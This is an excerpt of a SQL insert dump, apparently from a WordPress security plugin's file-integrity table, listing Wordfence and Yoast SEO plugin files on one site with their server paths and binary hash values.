('@¹à\Z!z‘žråÊÙWžÈp', 'wp-content/plugins/wordfence/views/waf/option-rules.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/option-rules.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É)\0€Qé¯N²É#$|ð', '‚¬t¢Ï·\0\re(xÔTån¶Þ_C³Q–Ç=ŒðK2U“C', '', 0, '?'),
('œ2X69G3ß\ZÏ+}Aü6', 'wp-content/plugins/wordfence/views/waf/option-whitelist.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/option-whitelist.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©.²‡…’â #Év¾}', '…i¨º©$‘¸h°}Äws¦óöçÖ©ºÁX¹¥2‡c', '', 0, '?'),
('zÉµ›‚@ö/Î/@ ', 'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Jä58OšO}ôös', '«ž¢„$9ªdS>;ð:‚¡€\nîïad_¨XÝ¦[F', '', 0, '?'),
('ì»[ÝÎäÓƒ©ï2¾W', 'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')”Vaî6°×ønE.–c', '0‚×e²ÃŠp´ðiÎva\Zoy-¼º[ò>|ª*Í', '', 0, '?'),
('K¯ª<©H<7ÅEž,lçß', 'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-brute-force.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª±jðg_G~¡Ûáy1ˆ', '.Òûùí’¹%´\\•z"|ÿdüK­± ¬×*€', '', 0, '?'),
('!¢yË''UµÇbÖð#}', 'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŽzYéèè¡†:€Lk', '3`R<‘ƒ!þÈÅ0)BÐWÙøgHÖZöø', '', 0, '?'),
('gµsôÎ)¡³mýç%', 'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ìç“`rœll¡3@Þ !s', 'F+RZÏ‚®eQ$epë•G%EvÑ-ÞþxE', '', 0, '?'),
('nAj+´uªúVG7d', 'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nR1íÕž‘Â\nþixBi', '‹µìSóâƒ§í¯É=ÈŒbjK„½ÝðŸÝiý$ïýê”y«', '', 0, '?'),
('=	]þéÿ’}úÜ*<.', 'wp-content/plugins/wordfence/views/waf/waf-install-manual.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-install-manual.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pm ª¥…°QýynRPqØ™', 'l¿,\\â©d.¸»þ"ÆbÖ´ðlzÔwÄ\\„E', '', 0, '?'),
('\\H¢û–:”¢u3à%‹Fw', 'wp-content/plugins/wordfence/views/waf/waf-install-success.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-install-success.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 't¥2ØHÊÁ‚$á\nã', '5¤(Ë/´¹PhJSÈZ"&]}“ùÒr³Ip¥(ä-tÍÛ', '', 0, '?'),
('…ZÄÛDŸ›l³=¸ì»«', 'wp-content/plugins/wordfence/views/waf/waf-install.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-install.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'UTFE`qÿ€ì!È‘G', '•s öÿ9û7Ü¿.àÔœWN‹…®ƒ(}Ï@ú\Z7', '', 0, '?'),
('uˆýúë[ý…†äêÚD', 'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#gÅxüÌ@ìoàÁTM³', 'óáÛeeë›6s  Ê-Š-Iµ$ëüQöÂ¼@Ùy•Ä', '', 0, '?'),
('p:”,¯`OlL´(éA', 'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k¥~ÂH°Àé7»<¿BáÞ', '\0!¥FæE¦¶×KP³£7ß»”0Õæ\n;6”}Šæ$', '', 0, '?'),
('’Aç“o\r÷ZÔ”_št', 'wp-content/plugins/wordfence/views/waf/waf-uninstall.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-uninstall.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬¬_bYZŠ	º9=æÞ¥\n', 'U§úˆòéôm-ÔÑSÂóÅz+ô?KÁŠÿs°Â~Ü', '', 0, '?'),
('Y¾J´Ð|Èí[D½ìy±Y', 'wp-content/plugins/wordfence/waf/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£E"xKÊê{Ç8ödS³', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
('¡ØHéaŒ+õ§­­Ì°I±', 'wp-content/plugins/wordfence/waf/bootstrap.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/bootstrap.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Àbçf¾ÆHuÅï¤Ù‚', 'zËt}©þ_±ö‰{/¸ª«r#§gbûžÛ•Z¤ºu', '', 0, '?'),
('¼±­ýÅ88àƒh¸lc’í', 'wp-content/plugins/wordfence/waf/dummy.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/dummy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ë:<]y­6jˆÐöz›0', '¦Ìw-c¨}ºº:¯i\\BSƒ¹q5…4¬uHÑ»‹†', '', 0, '?'),
('õ¦o¼bBrÏj3#\r¼—', 'wp-content/plugins/wordfence/waf/pomo/entry.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/entry.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';Â²iGQŒ’AÔê®w', '79]“ù§#Œ/–Ã÷rùbCte\\cõ’˜ßžƒP', '', 0, '?'),
('®‚R	¿(¼,	!)ÎZ', 'wp-content/plugins/wordfence/waf/pomo/mo.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/mo.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D‰œ6ûæ~.’ÅçSì[', '°Æ\\''÷_Fî uæC)CR"(C¹OÛYWÏ!žÈ)', '', 0, '?'),
('à*¢™°¹''Kj¨›Ì°!c', 'wp-content/plugins/wordfence/waf/pomo/plural-forms.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/plural-forms.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'P!7GñúýŸÇŠúq`.', '.’¼\n)[.ßéc¬f£‘\r›\rFºäZkïœ£´', '', 0, '?'),
('BÏµ‰ÈóH@xª¯/', 'wp-content/plugins/wordfence/waf/pomo/po.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/po.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œvc+p*Û"G–¤?õB', 'ŠMO(‚ÏÎ G\rkHÔ½²eqÏæ	ÃÇˆšFÏoë€OË-', '', 0, '?'),
('PÐ/:ïÕÌ®¸Ò‰¶ûÖH', 'wp-content/plugins/wordfence/waf/pomo/streams.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/streams.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·"¥Çæxx÷!3ÎW¤§', '\r,Ûîàø&Ž¾üò‰É©•!‰Œ:Âxl­ó[', '', 0, '?'),
('ªf(¼9ìÒ6›yaN|2', 'wp-content/plugins/wordfence/waf/pomo/translations.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/translations.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŠúÄ\\cŽ±´»Ëg–ŽÙ', ' ™ÚÏžOÊ)3JFßN,þŠëx£r¡B\0»''', '', 0, '?'),
('\0ÐDø`ø8R¦ÇÉ²%†', 'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·‚©ƒû½É<6»<', 'ƒÕà,îû=œŠ¤–CcŸjxffS…¢¯L¤ú°¨é'';', '', 0, '?'),
('%û¢Ã›7Òáå¨³Ì', 'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Gùbê¥ö·åÙö‚÷ÅÕZ', 'Sü\ZV€Z€DfGbƒ–ïÂ¸zÈýŸ™Cì\Zbï>ø', '', 0, '?'),
('E#ÍÕç-v37Ù6ëÅ¤', 'wp-content/plugins/wordfence/wordfence.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/wordfence.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì°ÔKš› tõóªâ=', 'ºûû‹º†J¶O_‡X¿s°ðuV™Ó†³ïÄ,ÿó‘', '', 0, '?'),
('€ÀA¢’š‡Á]×˜', 'wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6ÏÅ7XÝ€˜:äÈç', '™mõ o''x½l8<‰}›Qkqêó0"žç·WÈU', '', 0, '?'),
('6‰3È“+ÎŒ¨!Áÿ', 'wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶a—£¶&ÝúÚ­¥ÃHB', 'h!´ÀüÄM’Áµ)|Ž3€ª§¹Ûz=eg/U«ÊÏBL', '', 0, '?'),
('¯éÞññ0†×ö[ÂÙ\\6', 'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ú•«…ò¶€ÌM]³qãn£', '%ð''%# %µBz‚ÜPM)Ôeó`mtõl¥ò)÷ÀGå', '', 0, '?'),
('Tê›\rÇ4å}œ^a@|O', 'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b9<¬¢Ò•¿IrBzL«*', 'Ï½åÄ"…õ˜_¤îÄ¦‡¯X%O¾4®Ó…:Y', '', 0, '?'),
('{õ;ôÀ13è84Ëæ/', 'wp-content/plugins/wordpress-seo/admin/ajax.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õB…šX¸!¢¥-ƒ7*', '"°«Ií¾ŒœT5ñçK½v‚Flg’1,ðš žCß', '', 0, '?'),
('7wâ–1ëJä0®k', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²Y˜ßÇõ·ßUq‡â‹', '#Å|“veâÓ‘þ†0æJEÂBGY:ü¥•À%ˆz', '', 0, '?'),
('ƒàÂñŸÈ˜	˜	\0}µP', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0ˆ*2‡*ZY.–?ã8ƒ', 'LOoµMÙ¸z Ó«7!µï“*ØÛÇõç¢s-ÏÆô&', '', 0, '?'),
('¥Ø‰…iIqt#]4', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'úcÂ¦¡Óy<ì:ÿGê', 'r¢öR®ã÷JÿÊÍª‹œÎM[ìéUt¯%þ‘îYx¤Å', '', 0, '?'),
('Fõ.Ícö«Èá…\nÕÆ$`©', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'j©h·yàO\\…PË¶³\0F', 'kÙvˆ''üä<¶«\ZŠk¾.ê.Œ>	qòÞvôê}EOÈ', '', 0, '?'),
('Lf·:ýóí)­³\n¾ª§', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EÙ±ž©uRßòáçÜ±Óþ]', 'ƒ°Î7²+yú6É„/-ŽÔ–0X.{âåÿå^âÙ¨jh', '', 0, '?'),
('«Jëž¿©h#·:!^`è=÷', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rv,%ŠfÉn£È2T¶ª', 'á’ Û#0èßåq*n\\\\!ŸçÈ×Í''A%¥!.k', '', 0, '?'),
('#þû¥ÛÚ^C‹‹Í%†¢k', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[DÇg<.vÜ©H#kßSI', '¶v(³JG¸ÆDøWó_<3O63éŽmŽ„\ZÇ', '', 0, '?'),
('&››¡DA‚Ñz5°~', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm!F¿VÛÈ¦þ¢àíïz', 'ERÓþo4•¶ºçr0!Àý¦fR’^:påÕd.­Õˆ', '', 0, '?'),
('å:Ú\\nJ°ŠÅE–¿Ø!', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ø4f¿úü''?’ÍS¶', 'JL°P‰=À<c3+¥aªOÕ—œE(Ð³', '', 0, '?'),
('‘¼}žNe¡ôÐA½¿@¤', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆäÉz%4 µ!¶G²SEk', '/OAoÖ8ý?AÁNÜÐ¹¢fýÒYK·\r¹ÆÕ-!', '', 0, '?'),
('ßÑÙWïà•l\nõSxc', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Îƒ£b§A×³°¾W¯‹È‘t', 'ALÒŒ®¬U…úk(œ»5Æ‰"ÒMªè8±ÙÙð', '', 0, '?'),
('^E‡ìd÷ëPM9Ç³', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ÿøûûê¾aB\rD×ÁÑ''Y', '±pCvŽ	]©#ÁAìï&í¼+â¥aÏ£Bƒ‡Ù®', '', 0, '?'),
('ÏÖŽ6üb9ªaÁ#s+W', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ZyŸãÀí€Pø„902¡', '\r‹w±Yû±;O''øl/7G÷K¼F €¥ „¸‰', '', 0, '?'),
('rô	Úe¢Âüâ–Zœû‘\r', 'wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹¤ÊËc`T8èbŠ\r{’\n', '¿†KPÅ\ZkÖf=HŒ°|ípRÍBõÎ…\0³gmé¦<û', '', 0, '?'),
('pÚ:Ÿ_\ZßCÞ,¯”Ùå¬', 'wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_ºïAÉºð^O)ü9ý‘', 'ã\Z‰Êê†e•ƒÍ%¥ÆÍ£Š]$ô…[g8Á0½á¯', '', 0, '?'),
('"YÎß:nªõA÷Í˜N', 'wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<}üÍ ”ÈŽ’Ýå– ', '´ªÏ}LGRå:ÿ}VÊ¶ÐÒG[–|ž+¼i«htºí³Ÿ', '', 0, '?'),
('-¬TªÚaÌP‰?è0et', 'wp-content/plugins/wordpress-seo/admin/class-admin-init.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-init.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì›[3Ú"³DØhÇ™ÇËõ\n', 'ò\Z¹°''ã.¹±ØÁ*¢@èóIÐ{<©Œ‘Ÿ•ì£', '', 0, '?'),
('÷Ï½šF§Ù·I=[ˆãs', 'wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hxÈÈÞlM¡Î¹¥œ´,', ']•Ô·ÄjšÆ"ËÏ4L)oE=‘dá	åÔæhÄÙ±È', '', 0, '?'),
('ÏÝš»y.\0åöØœ¨iþ', 'wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ':KóÙê¤Î`%´¥†8ÈŽ', '%goÊÓöªx{¤Q6ûãˆ{Z‘šÀq…YêE™_r', '', 0, '?'),
('©è†©ü)1áæìÝ', 'wp-content/plugins/wordpress-seo/admin/class-admin-utils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eƒušÖœâ ×kâæ2', '[´¹”þ–Ñ…’wý†ô\Z¨§„ÊmFéå‚&lIHl9', '', 0, '?'),
('±À¨-’]ü\rù~(#÷', 'wp-content/plugins/wordpress-seo/admin/class-admin.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',!(º…wòÖUoÏ‡Ø?', 'Ù+²lu†}C-V\nª›á]…•B¢Ä0ÇmÎx*§Y', '', 0, '?'),
('k¼xµrÒ,jä×i­™ë(', 'wp-content/plugins/wordpress-seo/admin/class-asset.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ê¡!ãWò‘‹@y`Ð:', '(É!ÚVÚ¨ôÞ#k±ëâh¢s’õ‚¥8\rRñöœQ°', '', 0, '?'),
('×ñÚM§…žéR¡Nßa ó', 'wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'íÔ……É×ö˜Gy®$ý”ë&', '‹ƒ\\’S/Ÿ3õ³)nbÌÇpz¸ì¶²2?TÆ•Á4', '', 0, '?'),
('•aÞ<„dƒÝQÕ8õæ™Õ', 'wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–ˆä)ÄMm…Ó‰¿1åzš ', 'ûBˆõWµ’gþ/~ŒÎÅ†ÁÝ¨&Ocëžo¨¶<û', '', 0, '?'),
('»ì\nøfQ8Wm æ¡=ÿR', 'wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'X)î/½Hp±XXæ‘#¡', '4Ù’º.ˆ„9›L¿`€r.+.è\0fžã±˜¬', '', 0, '?'),
('!|î8þü×I,çÎ ›¤', 'wp-content/plugins/wordpress-seo/admin/class-collector.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-collector.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²zÛÑ~0Œ™=‚›Ê', '¤vnÝ¤«ögÃ:Z6sÁ°!¹øÈ”l)8~=', '', 0, '?'),
('%—‹ñVÚúÐ‹]¿í=w', 'wp-content/plugins/wordpress-seo/admin/class-config.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-config.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìþÈ$Eo''»\rBÀ;E2', 'Fá§Þ3]ÈâîmTG°Nl¿‚ñg\rJøu°+|!a', '', 0, '?'),
('<än~”LµÙM…ˆrç±', 'wp-content/plugins/wordpress-seo/admin/class-customizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-customizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñï,×¬\n)&`²½¿', '{u…Súš$ÍO­yMOój×Àµ€%@+#¡Ð÷zG4=', '', 0, '?'),
('É§M:‚Eçë(¬Ž6%=', 'wp-content/plugins/wordpress-seo/admin/class-database-proxy.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-database-proxy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'QÀëyÞ\Z–š2L«†V\reÇ', '®–Ñáqœûey\0¥«‡ïA€†''.·%	èB›9', '', 0, '?'),
('~VXAÍÛ&_§Mõ@em', 'wp-content/plugins/wordpress-seo/admin/class-export.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-export.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ž¹i‡è]¡@5Üî|>Æ;', '1g_\0hË¦»âi!øKNÝ÷.se~Jð—x*®@', '', 0, '?'),
('n§Èægó7ÍÛÿÎxÕÚA', 'wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õñÇÉ’¸I½Ûtb‚', '\núNÝáù''ýQõÛ­ÒÛ‡7³¦íï—K7æÑ”', '', 0, '?'),
('‚p)ðT\Z35éÉâÈëó½', 'wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢*ÌôŽÒSê\r¿£„ïÛ', '«*Ÿ\0Orö“&’1ú@Œ…ÀÍõG`l¨Íßb', '', 0, '?'),
('p9}dZBwöNNå7`m', 'wp-content/plugins/wordpress-seo/admin/class-meta-columns.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-meta-columns.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'x)uÐÜÖ4à˜¾€n‰I', 'H¼èe¥VÝŽ•ÝDÀíƒDó°¥Ì¦³\\èà§²§¹', '', 0, '?'),
('88ÌÆe“7MdÇ>“CWþ', 'wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õmòé¥njRENÑ6ð', '/â\n1Z·c³CßEÝ4¹`D:Dê,%ÝöYÏÆÉ×©«', '', 0, '?'),
('\nêŽ÷w›t…“.	‘ºä', 'wp-content/plugins/wordpress-seo/admin/class-option-tab.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-option-tab.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\r"¡ÿðáþùË|PÇt}Ô', 'Ðî5=J-ž¦ë¯Hš ÇÒXø‘¨!4ª¸ëp±LÁÔ', '', 0, '?'),
('®NR,äJà–*æÌ¦G$iƒ', 'wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'äbkÞ‹m,Ý)È®!p', '¸‰2Ø¡…²äèKÑoÉ[¼k|ÒíZVÃT|Çcö', '', 0, '?'),
('Â¡Hï²’ÏþxT7D', 'wp-content/plugins/wordpress-seo/admin/class-option-tabs.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-option-tabs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è[¤éÑÇÙ¡¼¼f¬¹ÿm', '?·Lž{pÜÞÀ	Q_¸¹i+<[3óah£ßOf¨’à', '', 0, '?'),
